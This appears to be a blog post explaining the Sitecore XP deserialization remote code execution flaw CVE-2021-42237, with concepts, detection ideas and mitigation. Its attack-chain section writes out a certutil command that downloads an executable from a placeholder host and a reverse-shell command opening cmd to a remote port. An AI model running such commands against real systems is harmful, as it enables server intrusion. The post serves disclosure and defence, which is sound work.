Sitecore’s Experience Platform (XP) is a .NET enterprise content management system (CMS). Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting. CVE-2021–42237 Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. Key Concepts before getting started Insecure Deserialization Serialization is the conversion of an object into a static stream of bytes, which can be saved to a database or transfer over a network. Deserialization is the reverse of that process, reconstructing a data structure or object from a series of bytes. The vulnerability occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized. When user-controllable data is deserialized by a website, this potentially enables an attacker to manipulate serialized objects to pass harmful data into the application code. Web Shell A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions. IIS instance (w3wp.exe) running suspicious processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web-accessible folders is a rare event and is typically a strong sign of web shell activity. Burp Collaborator A network service that Burp Suite uses to help discover many kinds of vulnerabilities. The Collaborator client can be used to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads. CertUtil A Windows binary used for handling certificates. The intended usage of certutil is to Dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components and verify certificates, key pairs, or certificate chains. But, it is possible to use the tool by attackers to fetch data from the Internet using a URL schema (ftp://, etc). http://, How a typical attack would look like? Sitecore XP uses insecure deserialization in Report.ashx file which can be leveraged by an attacker to execute arbitrary code on the system Scanning attempts on the vulnerable server URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx” nslookup from the endpoint towards burpcollaborator domain nslookup 5ouceXYZQtem.burpcollaborator.net Payload download “C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.netcertutil -f -urlcache http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe Reverse shell C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd By successfully exploiting this vulnerability, an attacker can gain arbitrary code execution as the user who is running the IIS instance. The attacker can then use "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution. Ideas for Detection Suspicious usage of certutil Identify certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. for Sigma rule. Link Suspicious nslookup traffic nslookup.exe execution and query towards *.burpcollaborator.net domain Mitigation The recommended solution is to upgrade to a secure version ideally Sitecore XP 9.0 or higher.. Alternatively the flaw can be mitigated by deleting the Report.ashx file from "/sitecore/shell/ClientBin/Reporting/Report.ashx" on all server instances. Reference https://blog.assetnote.io/2021/11/02/sitecore-rce/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237 https://lolbas-project.github.io/lolbas/Binaries/Certutil/ https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/concepts/serialization/ Also published here .

Fetch

Microsoft

2022 - HackerNoon Contributor of the Year - Cms

2022 - HackerNoon Contributor of the Year - Company Culture

2022 - HackerNoon Contributor of the Year - Java

Nominated for 2022 - HackerNoon Contributor of the Year - Java

Nominated for 2022 - HackerNoon Contributor of the Year - Company Culture

Nominated for 2022 - HackerNoon Contributor of the Year - Cms

Too Long; Didn't Read

An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022

An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022

Too Long; Didn't Read

Companies Mentioned

@kaiiyer

RELATED STORIES